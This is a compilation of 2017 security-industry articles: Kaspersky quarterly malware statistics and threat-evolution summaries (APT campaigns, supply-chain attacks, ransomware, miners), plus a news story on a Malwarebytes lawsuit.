The distribution of exploits by the type of attacked application this quarter was practically the same as in Q2. First place is still occupied by exploits targeting browsers and browser components with a share of 35.0% (a decline of 4 p.p. compared to Q2.) The proportion of exploits targeting Android vulnerabilities (22.7%) was almost identical to that in Q2, placing this type of attacked application once again in third behind Office vulnerabilities.

Online threats (Web-based attacks)
These statistics are based on detection verdicts returned by the web antivirus module that protects users at the moment when malicious objects are downloaded from a malicious/infected web page. Malicious sites are specifically created by cybercriminals; infected web resources include those whose content is created by users (e.g. forums), as well as legitimate resources.

Online threats in the banking sector
These statistics are based on detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data. Beginning from the first quarter of 2017 these statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats.

In Q3 2017, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs capable of stealing money via online banking on 204,388 computers.

Number of users attacked by financial malware, Q3 2017

Geography of attacks
To evaluate and compare the risk of being infected by banking Trojans and ATM and POS-malware worldwide, we calculate the percentage of Kaspersky Lab product users in the country who encountered this type of threat during the reporting period, relative to all users of our products in that country.

Geography of banking malware attacks in Q3 2017 (percentage of all users attacked)

TOP 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked)

Country* % of users attacked**
1 Togo 2.30
2 China 1.91
3 Taiwan 1.65
4 Indonesia 1.58
5 South Korea 1.56
6 Germany 1.53
7 United Arab Emirates 1.52
8 Lebanon 1.48
9 Libya 1.43
10 Jordan 1.33
These statistics are based on detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.
* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (under 10,000).
** Unique users whose computers have been targeted by banking Trojan malware attacks as a percentage of all unique users of Kaspersky Lab products in the country.

TOP 10 banking malware families
The table below shows the Top 10 malware families used in Q3 2017 to attack online banking users (in terms of percentage of users attacked):

Name* % of attacked users**
1 Trojan-Spy.Win32.Zbot 27.9
2 Trojan.Win32.Nymaim 20.4
3 Trojan.Win32.Neurevt 10.0
4 Trickster 9.5
5 SpyEye 7.5
6 Caphaw 6.3
7 Trojan-Banker.Win32.Gozi 2.0
8 Shiz 1.8
9 ZAccess 1.6
10 NeutrinoPOS 1.6
* The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware.

The malware families Dridex and Tinba lost their places in this quarter’s Top 10. One of their former positions was occupied by the Trickster bot (accounting for 9.5% of attacked users), also known as TrickBot, a descendant of the now defunct Dyre banker. There was a small change in the leading three malicious families. First and second places are still occupied by Trojan-Spy.Win32.Zbot (27.9%) and Trojan.Win32.Nymaim (20.4%) respectively, while third place is now occupied by Trojan.Win32.Neurevt (10%) whose share grew by nearly 4 p.p.

Cryptoware programs
Q3 highlights
Crysis rises from the dead
In our Q2 report we wrote that the cybercriminals behind the Crysis ransomware cryptor halted distribution of the malware and published the secret keys needed to decrypt files. This took place in May 2017, and all propagation of the ransomware was stopped completely at that time.

However, nearly three months later, in mid-August, we discovered that this Trojan had come back from the dead and had set out on a new campaign of active propagation. The email addresses used by the blackmailers were different from those used in earlier samples of Crysis. A detailed analysis revealed that the new samples of the Trojan were completely identical to the old ones apart from just one thing – the public master keys were new. Everything else was the same, including the compilation timestamp in the PE header and, more interestingly, the labels that the Trojan leaves in the service area at the end of each encrypted file. Closer scrutiny of the samples suggests that the new distributors of the malware didn’t have the source code, so they just took its old body and used a HEX editor to change the key and the contact email.

The above suggests that this piece of ‘zombie’ malware is being spread by a different group of malicious actors rather than its original developer who disclosed all the private keys in May.

Surge in Cryrar attacks
The Cryrar cryptor (aka ACCDFISA) is a veteran among the ransomware Trojans that are currently being spread. It emerged way back in 2012 and has been active ever since. The cryptor is written in PureBasic and uses a legitimate executable RAR archiver file to place the victim’s files in password-encrypted RAR-sfx archives.

In the first week of September 2017 we recorded a dramatic rise in the number of attempted infections with Cryrar – a surge never seen before or since. The malicious actors used the following approach: they crack the password to RDP by brute force, get authentication on the victim’s system using the remote access protocol and manually launch the Trojan’s installation file. The latter, in turn, installs the cryptor’s body and the components it requires (including the renamed RAR.EXE file), and then automatically launches the cryptor.

According to KSN data, this wave of attacks primarily targeted Vietnam, China, the Philippines and Brazil.

Master key to original versions of Petya/Mischa/GoldenEye published
In July 2017, the authors of the Petya Trojan published their master key, which can be used to decrypt the Salsa keys required to decrypt MFT and unblock access to systems affected by Petya/Mischa or GoldenEye.

This happened shortly after the ExPetr epidemic which used part of the GoldenEye code. This suggests that the authors of Petya/Mischa/GoldenEye did so in an attempt to distance themselves from the ExPetr attack and the outcry that it caused.

Unfortunately, this master key won’t help those affected by ExPetr, as its creators didn’t include the option of restoring a Salsa key to decrypt MFT.

The number of new modifications
In Q3 2017, we identified five new ransomware families in this classification. It’s worth noting here that this number doesn’t include all the Trojans that weren’t assigned their own ‘personal’ verdict. Each quarter, dozens of these malicious programs emerge, though they either have so few distinctive characteristics or occur so rarely that they and the hundreds of others like them remain nameless, and are detected with generic verdicts.

Number of newly created cryptor modifications, Q3 2016 – Q3 2017

The number of new cryptor modifications continues to decline compared to previous quarters. This could be a temporary trend, or could indicate that cybercriminals are gradually losing their interest in cryptors as a means of making money, and are switching over to other types of malware.

The number of users attacked by ransomware
July was the month with the lowest ransomware activity. From July to September, the number of ransomware attacks rose, though it remained lower than May and June when two massive epidemics (WannaCry and ExPetr) struck.

Number of unique users attacked by Trojan-Ransom cryptor malware (Q3 2017)

The geography of attacks

Top 10 countries attacked by cryptors
Country* % of users attacked by cryptors**
1 Myanmar 0.95%
2 Vietnam 0.92%
3 Indonesia 0.69%
4 Germany 0.62%
5 China 0.58%
6 Russia 0.51%
7 Philippines 0.50%
8 Venezuela 0.50%
9 Cambodia 0.50%
10 Austria 0.49%
* We excluded those countries where the number of Kaspersky Lab product users is relatively small (under 50,000)
** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country.

Most of the countries in this Top 10 are from Asia, including Myanmar (0.95%), a newcomer to the Top 10 that swept into first place in Q3. Vietnam (0.92%) came second, moving up two places from Q2, while China (0.58%) rose one place to fifth.

Brazil, Italy and Japan were the leaders in Q2, but in Q3 they failed to make it into the Top 10. Europe is represented by Germany (0.62%) and Austria (0.49%).

Russia, in tenth the previous quarter, ended Q3 in sixth place.

Top 10 most widespread cryptor families
Name Verdict* % of attacked users**
1 WannaCry Trojan-Ransom.Win32.Wanna 16.78%
2 Crypton Trojan-Ransom.Win32.Cryptoff 14.41%
3 Purgen/GlobeImposter Trojan-Ransom.Win32.Purgen 6.90%
4 Locky Trojan-Ransom.Win32.Locky 6.78%
5 Cerber Trojan-Ransom.Win32.Zerber 4.30%
6 Cryrar/ACCDFISA Trojan-Ransom.Win32.Cryrar 3.99%
7 Shade Trojan-Ransom.Win32.Shade 2.69%
8 Spora Trojan-Ransom.Win32.Spora 1.87%
9 (generic verdict) Trojan-Ransom.Win32.Gen 1.77%
10 (generic verdict) Trojan-Ransom.Win32.CryFile 1.27%
* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware.

Wannacry (16.78%) tops the rating for Q3, and the odds are that it’s set to remain there: the worm has been propagating uncontrollably, and there are still huge numbers of computers across the globe with the unpatched vulnerability that Wannacry exploits.

Crypton (14.41%) came second. This cryptor emerged in spring 2016 and has undergone many modifications since. It has also been given multiple names: CryptON, JuicyLemon, PizzaCrypts, Nemesis, x3m, Cry9, Cry128, Cry36.

The cryptor Purgen (6.90%) rounds off the top three after rising from ninth. The rest of the rating is populated by ‘old timers’ – the Trojans Locky, Cerber, Cryrar, Shade, and Spora.

The Jaff cryptor appeared in the spring of 2017, going straight into fourth place in the Q2 rating, and then stopped spreading just as suddenly.

Top 10 countries where online resources are seeded with malware
The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In the third quarter of 2017, Kaspersky Lab solutions blocked 277,646,376 attacks launched from web resources located in 185 countries around the world. 72,012,219 unique URLs were recognized as malicious by web antivirus components.

Distribution of web attack sources by country, Q3 2017

In Q3 2017, the US (3.86%) was home to most sources of web attacks. The Netherlands (25.22%) remained in second place, while Germany moved up from fifth to third. Finland and Singapore dropped out of the top five and were replaced by Ireland (1.36%) and Ukraine (1.36%).

Countries where users faced the greatest risk of online infection

In order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of users attacked**
1 Belarus 27.35
2 Algeria 24.23
3 Russia 23.91
4 Armenia 23.74
5 Moldova 23.61
6 Greece 21.48
7 Azerbaijan 21.14
8 Kyrgyzstan 20.83
9 Uzbekistan 20.24
10 Albania 20.10
11 Ukraine 19.82
12 Kazakhstan 19.55
13 France 18.94
14 Venezuela 18.68
15 Brazil 18.01
16 Portugal 17.93
17 Vietnam 17.81
18 Tajikistan 17.63
19 Georgia 17.50
20 India 17.43
These statistics are based on detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.
* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** Unique users whose computers have been targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

On average, 16.61% of computers connected to the Internet globally were subjected to at least one Malware-class web attack during the quarter.

Geography of malicious web attacks in Q3 2017 (ranked by percentage of users attacked)

The countries with the safest online surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%) and Cuba (4.44%).

Local threats
Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q3 2017, Kaspersky Lab’s file antivirus detected 198,228,428 unique malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

The rating of malicious programs only includes Malware-class attacks. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of users attacked**
1 Yemen 56.89
2 Vietnam 54.32
3 Afghanistan 53.25
4 Uzbekistan 53.02
5 Laos 52.72
6 Tajikistan 49.72
7 Ethiopia 48.90
8 Syria 47.71
9 Myanmar 46.82
10 Cambodia 46.69
11 Iraq 45.79
12 Turkmenistan 45.47
13 Libya 45.00
14 Bangladesh 44.54
15 China 44.40
16 Sudan 44.27
17 Mongolia 44.18
18 Mozambique 43.84
19 Rwanda 43.22
20 Belarus 42.53
These statistics are based on detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.
* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** The percentage of unique users in the country with computers that blocked Malware-class local threats as a percentage of all unique users of Kaspersky Lab products.

This Top 20 of countries has not changed much since Q2, with the exception of China (44.40%), Syria (47.71%) and Libya (45.00%) all making an appearance. The proportion of users attacked in Russia amounted to 29.09%.

On average, 23.39% of computers globally faced at least one Malware-class local threat during the third quarter.

Geography of local malware attacks in Q3 2017 (ranked by percentage of users attacked)

The safest countries in terms of local infection risks included Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czechia (7.89%), Ireland (6.86%) and Japan (5.79%).

All the statistics used in this report were obtained using Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity.

Malwarebytes Scores Legal Win Over Enigma Software
 12.11.2017 securityweek Cyber
Enigma Software, supplier of software known as SpyHunter, has a notice on its website: "Malwarebytes Inc., the maker of Malwarebytes Anti-Malware ("MBAM") and AdwCleaner, is intentionally blocking SpyHunter and RegHunter for what we believe are competitive reasons... We have taken legal action against Malwarebytes and are seeking remedies for this unfair conduct."

Those legal remedies were dismissed by the District Court, Northern District of California, San Jose Division on November 7, 2017.

The heart of the issue has been Malwarebytes' determination that SpyHunter is effectively a PUP; that is, a potentially unwanted program. PUPs tend to be nuisances rather than specifically malware. They are often adware apps that are easy to install and difficult to remove, offering little practical value to the consumer. Malwarebytes has been one of the more aggressive endpoint protection vendors in its classification and removal of PUPs.

It does so with SpyHunter -- and Enigma Software objected. Enigma's legal complaint claimed that Malwarebyte's actions were competitively motivated, and it asked the court for "Preliminarily and permanently enjoining Malwarebytes from programming MBAM to prevent the download and installation of SpyHunter or RegHunter;" adding a request for "punitive damages".

In response, Malwarebytes requested the court to dismiss Enigma's action, citing immunity under the Communications Decency Act -- which states, "No provider or user of an interactive computer service shall be held liable on account of... any action voluntarily taken in good faith to restrict access to or availability of material that the provider or user considers to be obscene, lewd, lascivious, filthy, excessively violent, harassing, or otherwise objectionable, whether or not such material is constitutionally protected..."

The court agreed, confirmed Malwarebytes' immunity, and dismissed Enigma's case.

This doesn't mean that SpyHunter is legally a PUP, only that Enigma cannot stop Malwarebytes from offering users the option to remove it under its PUP program.

F-Secure's Sean Sullivan commented, "We at F-Secure have our own PUP criteria in our efforts to do what's best and right for our customers -- and I'm comfortable that's exactly the intentions of the folks at Malwarebytes. Fighting for their customers -- good for them!"

Malwarebytes is delighted. "This is not only a critical win for Malwarebytes, but for all security providers who will continue to have legal protection to do what is right for their users," blogged CEO Marcin Kleczynski yesterday. "This decision affirms our right to enable users by giving them a choice on what belongs on their machines and what doesn't."

It's too early to tell whether this is the beginning of the end of the PUP problem. "I'm not sure how much difference isolated instances of case law will make in the short term," comments ESET senior research fellow, David Harley, "but anything that tends to make monetization firms more answerable to the needs of the population as a whole -- or at least that sector of the population whose interests the security industry aims to protect -- is positive. It might be better in the long term, though, if the software distribution and monetization industries and the security vendors work out their differences in the context of the Clean Software Alliance. Well, we can but hope," he added.

Luis Corrons, technical director at PandaLabs, is not sure that the battle can be won in the courts. "All PUP fights in court, win or lose," he told SecurityWeek, "are a waste of time and resources for all of us. We could fight in court for ages and that won't help anyone."

Instead, he hopes for a solution via a relatively new organization, AppEsteem. "It is time to take a different approach in this field," he continued. Here what AppEsteem is doing has the potential to be a game-changer that helps everyone: users not being bothered by software that does not behave properly, security vendors focusing only on protecting their users and software vendors making money by being transparent and offering real value to end users."

AppEsteem's president, Dennis Batchelder, is clear, however. The result from the courts is "great for security companies, but more importantly, this dismissal is a big win for consumers. Security companies can truly put protection first. This strengthens AppEsteem's resolve to call out every deceptive app and drive a world where consumers are safe from fraud."

IT threat evolution Q3 2017
11.11.2017 Kaspersky Cyber
Targeted attacks and malware campaigns
[Re-]enter the dragon
In July, we reported on the recent activities of a targeted attack group called ‘Spring Dragon’ (also known as LotusBlossom), whose activities data back to 2012. Spring Dragon makes extensive use of spear-phishing and watering-hole attacks. The group’s targets include high-profile government agencies, political parties, educational institutions and telecommunication around the South China Sea – including Taiwan, Indonesia, Vietnam, the Philippines, Hong Kong, Malaysia and Thailand.

Most of the malicious tools implemented by Spring Dragon over the years are backdoors designed to steal data, execute additional malware components and run system commands on victim’s computers. These give the attackers the ability to undertake a variety of different malicious activities on their victims’ computers. The group maintains a large C2 infrastructure, comprising more than 200 unique IP addresses and C2 domains.

The large number of samples that we have collected have customized configuration data, different sets of C2 addresses with new hardcoded campaign IDs, as well as customized configuration data for creating a service for malware on a victim’s system – all of which makes detection more difficult.

We think it is likely that Spring Dragon, like many other targeted attack campaigns, is likely to re-surface in this region, so it is important for organisations to make effective use of good detection mechanisms such as YARA rules and IDS signatures.

You can read our report on Spring Dragon here.

One of the most striking aspects of the ExPetr attacks earlier this year was its primary attack vector: the attackers specifically targeted a company supplying accounting software to Ukrainian companies. Most of the victims of this wiper were located in Ukraine. However, it recently became clear that the attack has had a significant impact on some companies that operate worldwide. Among them are Maersk, the world’s largest container ship and supply vessel company. The company indicated in its earnings report that it expected losses of between $200 and $300 as a result of ‘significant business interruption’ caused by the ExPetr attack. Another was FedEx, which revealed that the operations of its TNT Express unit in Europe were ‘significantly affected’ by the attack, costing the company around $300 in lost earnings.

In recent months, we have seen further cases of attackers compromising software supply chain providers and using this as a stepping-stone into their chosen targets.

In July, we discovered suspicious DNS requests on the network of a customer working in the financial services industry: we found the requests on systems used to process transactions. The source of the DNS queries was a package for popular server management software developed by NetSarang. Customers of NetSarang, which has headquarters in South Korea and the United States, include companies working in financial services, energy, retail, technology and media. The attackers had modified one of the updates to include a backdoor.

NetSarang quickly removed the compromised update, but not before it had been activated at least once (we were able to confirm an activation on a computer in Hong Kong).

The attackers hide their malicious intent in several layers of encrypted code. The tiered architecture means that the business logic of the backdoor is not activated until a special packet has been received from the first tier C2 (Command and Control) server. Until then, it transfers basic information every eight hours: this includes computer, domain and user names. The payload is only activated through a crafted ‘dns.txt’ record for a specific domain. This allows the attackers to glean system information and send a decryption key to unlock the next stage of the attack, activating the backdoor itself.

This backdoor, called ShadowPad, is a modular platform that lets the attackers download and execute arbitrary code, create processes and maintain a virtual file system in the registry, all of which are encrypted and stored in locations unique to each victim.

You can read more about ShadowPad here.

Another supply-chain attack occurred in September, when attackers compromised an update to the Windows clean-up utility CCleaner, published by Avast. Researchers at Cisco Systems Talos Group discovered that attackers had modified the installer for CCleaner 5.3 to drop their malware on the computers of anyone who downloaded the utility. The malware, which was signed with a valid certificate, was active for a month and infected around 700,000 computers. The attackers used a two-stage infection process. The first delivered a profile of the victim to the attackers C2 servers, while the second was reserved for specific targets. You can find details of the analysis here.

It is sometimes tempting for companies to imagine that no one would want to target them – perhaps because they are not a large company, or because they do not believe that they have anything of significance to an attacker. However, even quite apart from their intellectual property, or personal information belonging to customers, they can be valuable as a stepping-stone into another organisation.

The bear facts
In August, we provided an update on an interesting APT that we call ‘WhiteBear’, related to the Turla group. Like Turla, WhiteBear uses compromised web sites and hijacked satellite connections for its C2 infrastructure. The project also overlaps with other Turla campaigns such as ‘Skipper Turla’ (or ‘WhiteAtlas’) and ‘Kopiluwak’ (both of which we detailed for subscribers to Kaspersky APT intelligence reports). In addition, we have found WhiteBear components on a subset of systems that were previously targeted by WhiteAtlas, with the same file-paths and identical filenames. Nevertheless, we have been unable to firmly tie the delivery of WhiteBear to any specific WhiteAtlas components, and we believe that WhiteBear is the product of a separate development effort and has a distinct focus.

For much of 2016, WhiteBear activity was narrowly focused on embassies and consulates around the world – all related to diplomatic and foreign affairs organisations. This shifted in mid-2017 to include defence-related organizations.

Although we’re not sure of the delivery vector for WhiteBear components, we strongly suspect that the group sends spear-phishing e-mails to its targets containing malicious PDF files.

The encryption implemented in the main module, the WhiteBear orchestrator, is particularly interesting. The attackers encrypt/decrypt, and pack/decompress the resource section with RSA+3DES+BZIP2. This implementation is unique and includes the format of the private key as stored in the resource section. 3DES is also present in Sofacy and Duqu 2.0 components, but they are missing in this Microsoft-centric RSA encryption technique. The private key format used in this schema and the RSA crypto combination with 3DES is (currently) unique to this group.

Most WhiteBear samples are signed with a valid code-signing certificate issued for ‘Solid Loop Ltd’, a once-registered British organization. This is probably a front organization or a defunct organization; and the attackers have assumed its identity to abuse the name and trust, in order to create deceptive digital certificates.

You can find full technical details of WhiteBear here.

(Un)documented Word feature abused by hackers
If a targeted attack is to be successful, the attackers must first gather intelligence on their prospective victims. In particular, they need details about the operating system and key applications, so that they can deliver the appropriate exploit.

During an investigation of a targeted attack, we found some spear-phishing e-mails with interesting Word documents attached to them. At first sight, they seemed unremarkable: they contained no macros, exploits or other active content.

However, on closer inspection, we found that they contained several links to PHP scripts located on third-party web resources. When we attempted to open these files in Microsoft Word, we found that the application addressed one of the links and, as a result, provided the attackers with information about software installed on the target computer. The documents were in OLE 2 (Object Linking and Embedding) format. OLE allows authors to embed objects and link to multiple objects or resources in a single Word document. For example, an author can created a field in a document that points to a graphic file, rather than simply embedding the graphic file.

We found a field in the document called ‘INCLUDEPICTURE’. The link to the image in this field should be in ASCII, but in this case, it was in Unicode. Microsoft documentation provides virtually no information about this field. However, the attackers manipulated the Unicode framework to trigger a GET request to malicious and obfuscated URLs contained in the underlying code of the Word document. These links then point to PHP scripts located on third-party web sites, enabling the attackers to gather information about the software installed on the computer.

This feature is not only present in Word for Windows, but also in Microsoft Office for iOS and in Microsoft Office for Android.

You can read further details about our investigation here.

Information security incidents and how to respond to them
Our growing dependence on technology, connectivity and data means that businesses present a bigger attack surface than ever. Targeted attackers have become more adept at exploiting their victims’ vulnerabilities to penetrate corporate defences while ‘flying under the radar’. Unfortunately, corporate information security services are often unprepared. Their employees underestimate the speed, secrecy and efficiency of modern cyber-attacks and businesses often fail to recognize how ineffective the old approaches to security are. Even where companies supplement traditional prevention tools such as anti-malware products, IDS/IPS and security scanners with detection solutions such as SIEM and anti-APT, they may not be used to their full potential.

You can’t manage what you can’t measure. One of the key factors in responding effectively to a targeted attack is to understand the nature of the incident.

In August, our incident response team used the example of a bank attack to present the key stages of a targeted attack (known as the kill chain) and the steps required for an effective incident response process. You can read the report here, but the following is a summary of the key elements.

The basic principles of a successful targeted attack include thorough preparation and a step-by-step strategy. The stages of the kill chain are:

RECONNAISSANCE (learning about the target)
WEOPANISATION (choosing the method of attack)
DELIVERY (deciding on the attack vector)
EXPLOITATION (exploiting a vulnerability to gain an initial foothold)
INSTALLATION (installing the malware)
COMMAND-AND-CONTROL (connecting to the attackers’ server for further instructions)
ACTIONS ON OBJECTIVE (achieving the attackers’ goals)

The basic principles behind the work of information security staff are the same as the attackers – careful preparation and a step-by-step strategy. The objectives, of course, are fundamentally different: to prevent incidents and, if one occurs, to restore the initial state of the system as soon as possible.

There are two main stages involved in responding to a specific incident: investigation and system restoration. The investigation must determine

The initial attack vector
The malware, exploits and other tools use by the attackers
The target of the attack (affected networks, systems and data)
The extent of the damage (including reputational damage) to the organisation
The stage of the attack (whether or not it was completed and the attackers’ goals were achieved)
Timeframes (when the attack started and ended, when it was detected and the response time of the information security service)
Once the investigation has been completed, it is necessary to use the information learned to create a system recovery plan or, if one exists, to assess how it can be improved.

The overall strategy includes the following steps.

PREPARATION (develop the tools, policies and processes needed to defend the organisation)
IDENTIFICATION (decide if an incident has occurred by identifying pre-defined triggers)
CONTAINMENT (limit the scope of the incident and maintain business continuity)
ERADICATION (restore the system to its pre-incident state)
RECOVERY (re-connect the affected systems to the wider network)
LESSONS LEARNED (how well did the information security team deal with the incident and what changes need to be made to the strategy)

In the event of the information security team having to respond to multiple incidents simultaneously, it’s important to correctly set priorities and focus on the main threats. The key factors involved in determining the severity of an incident include:

The network segment where the compromised computer is located
The value of the data stored on that computer
The type and number of incidents that affect the same computer
The reliability of the IoCs (Indicators of Compromise) for this incident
The choice of computer, server or network segment to deal with first will depend on the specific nature of the organisation.

Malware stories
The hidden advertising threat
As well as banking Trojans, ransomware and other threats that can clearly be defined as malware, people also face numerous borderline programs – including advertising bots and modules, and partnership programs – which are typically referred to as ‘potentially unwanted programs’. They are borderline because there is sometimes a fine line between classifying something as an outright Trojan or adware. One such program is Magala, a Trojan-Clicker.

Such programs imitate a user click on a particular web page, thus boosting advertisement click counts. Magala doesn’t actually affect the person whose computer it is installed on, other than consuming some of their computer’s resources. The victims are those who pay for the advertising – typically small business owners doing business with unscrupulous advertisers.

The first stage of the infection involves the Trojan checking which version of Internet Explorer is installed and locating it in the system. The Trojan doesn’t run if it’s version 8 or earlier. Otherwise, it initialises a virtual desktop, used to perform all subsequent activities. Then it runs a sequence of utility operations (typical for this type of malware): it sets up autorun, sends a report to a hardcoded URL, and installs the required adware. To interact with the content of an open page, Magala uses IHTMLDocument2, the standard Windows interface that makes it easy to use DOM tree. The Trojan uses it to load the MapsGalaxy Toolbar, installs this on the system and adds the site ‘hxxp://hp.myway.com’ to the system registry, associating it with MapsGalaxy so that it becomes the browser’s home page.

The Trojan then contacts the remote server and requests a list of search queries for the click counts that it needs to boost. The server returns this list in plain text. Magala uses the list to send the requested search queries and clicks on each of the first 10 links in the search results, with an interval of 10 seconds between each click.

The average cost per click in a campaign of this sort is $0.07. So a botnet consisting of 1,000 infected computers clicking 10 web site addresses from each search result, performing 500 search requests with no overlaps in the search results, could earn the cybercriminals up to $350 from each infected computer. However, this is just an estimate as the costs can vary greatly in each situation.

Statistics from March to early June 2017 indicate that most Magala infections occur in the United States and Germany.

This class of program typically doesn’t present as much of a threat to consumers as, for example, banking Trojans or ransomware. However, two things make it tricky to deal with. First, such programs straddle the borderline between legitimate and malicious software and it’s vital to determine whether a specific program is part of a secure and legal advertising campaign or if it’s illegitimate software making use of similar functions. Second, the sheer quantity of such programs means that we need to use a fundamentally different approach to analysis.

You can read more about Magala here.

It started with a link
Cybercriminals are constantly on the lookout for ways of luring unsuspecting victims into doing things that compromise their security and capture personal data. In August, David Jacoby from Kaspersky Lab and Frans Rosen from Detectify teamed up to expose one such campaign that used Facebook Messenger to infect people.

It started with a link to a YouTube video. The cybercriminals behind the scam used social engineering to trick their victims into clicking on it: the message contained the recipient’s first name, plus the word ‘Video’ – for example ‘David Video’ – and then a bit.ly link.

This link pointed to Google Drive, where the victim would see what looks like a playable movie, with a picture of them in the background and what seems to be a ‘Play’ button.

If the victim tried to play the video in the Chrome browser, they were redirected to what looked like a YouTube video and were prompted to install a Chrome extension –in fact, this was the malware. The malware waited for the victim to sign in to their Facebook account and stole their login credentials. It also captured information about their Facebook contacts and sent malicious links to their friends – so spreading the infection further.

Anyone using a different extension was nagged into updating their Adobe Flash Player instead – but the file they downloaded was adware, earning money for the cybercriminals through advertising.

This attack relied heavily on realistic social interactions, dynamic user content and legitimate domains as middle steps. The core infection point of the spreading mechanism was the installation of a Chrome Extension. It’s really important to be careful about allowing extensions to control your browser interactions and also to make sure that you know exactly what extensions you are running in your browser. In Chrome, you can type ‘chrome://extensions/’ into the address field of your browser to get a list of enabled extensions. On top of this, of course, be wary about clicking on links. If you’re in any doubt about whether it’s legitimate or not, contact the sender to check if it was really them who sent it.

Undermining your security
We have seen a substantial growth in crypto-currency miners this year. In 2013, our products blocked attempts to install miners on the computers of 205,000 people protected by Kaspersky Lab products. In 2014, this increased to 701,000. In the first eight months of 2017, this increased to 1.65 million.

Crypto-currency mining is not illegal. However, there are groups of people who trick unwitting people into installing mining software on their computers, or exploit software vulnerabilities to do so. The criminals obtain crypto-currency, while the computers of their victims slow down. We have recently detected several large botnets designed to profit from concealed crypto mining. We have also seen growing numbers of attempts to install miners on servers owned by organizations. When these attempts are successful, the business processes of the target organisations suffer because data processing speeds fall substantially.

The main method used to install miners is adware installers spread using social engineering. There are also more sophisticated propagation methods – one is using the EternalBlue exploit published in April 2017 by the Shadow Brokers group. In this case, the cybercriminals tend to target servers – these provide them with a more powerful asset.

We recently detected a network made up of an estimated 5,000 plus computers on which Minergate, a legal console miner, had been installed without the knowledge or consent of the victims. The victims had downloaded the installer from a file-hosting service, under the guise of a freeware program or keys to activate licensed products. This installer downloader the miner’s dropper file to their computer. This installed the Minergate software to the computer, ensuring that it is loaded each time the computer boots and re-installing it if it is deleted.

Often, crypto-miners come with extra services to maintain their presence in the system, launch automatically every time the computer boots and conceal their operation. Such services could, for example try to turn off security software, monitor system activities or ensure that the mining software is always present by restoring it if the files are deleted.

Concealed miners are very difficult to detect because of their specific nature and operating principles. Anyone can choose to install this kind of software and legally use it to mine a crypto-currency.

Monero (XMR) and Zcash are the two currencies most often used in concealed mining. They both ensure the anonymity of transactions – this is clearly very useful for cybercriminals. Even according to conservative estimates, a mining network can generate up to $30,000 per month for its owners.

The above image shows a wallet coded into the miner’s configuration data. At the time of writing, 2,289 XMR had been transferred from this wallet, which at the current exchange rate is equivalent to $208,299.

You can read more here.

Connected hospitals
Technology now reaches into more parts of society than ever before. As a result, organisations that previously didn’t need to think about cyber-security now face cyber-attacks. One example of this is the healthcare industry. Medical information that has traditionally existed in paper form is now to be found in databases, portals and medical equipment.

Data security in medicine is more serious than it seems at first glance. The obvious issue might be the theft and resale of medical data on the black market. However, the possibility of diagnostic data being modified by attackers is even more alarming. Regardless of the goals of the attackers (extortion or attacks targeted at specific patients), there’s a serious risk to patients: after receiving incorrect data, doctors may prescribe the wrong course of treatment. Even if the attempt to substitute data is detected in time, the normal operation of the medical facility may be disrupted, prompting the need to verify all of the information stored on compromised equipment. According to a report by the Centre for Disease Control and Prevention (CDC), the third leading cause of death in the United States comes from medical errors. Establishing a correct diagnosis depends not only on the knowledge and skill of a doctor, but on the correctness of data received from medical devices and stored on medical servers. This makes the resources for connected medicine a more attractive target for attackers. Unfortunately, in some cases, the security of the network infrastructure of healthcare facilities is neglected, and resources that process medical information are accessible from outside sources.

This term ‘connected medicine’ refers to a large number of workstations, servers, and dedicated medical equipment that are connected to the network of a medical institution (a simplified model is shown in the figure below).

Diagnostic devices can be connected to the LAN of an organization or to workstations- for example, through a USB connection. Medical equipment quite often processes data (for example, a patient’s photographs) in DICOM format, an industry standard for images and documents. In order to store them and provide access to them from outside, PACS (Picture Archiving and Communication Systems) are used, which can also be of interest to cybercriminals.

We have put together some recommendations for securing medical facilities. You can find the details here, but the following is a summary of the key points:

Prevent public access to all nodes that process medical data
Assign counter-intuitive names to resources
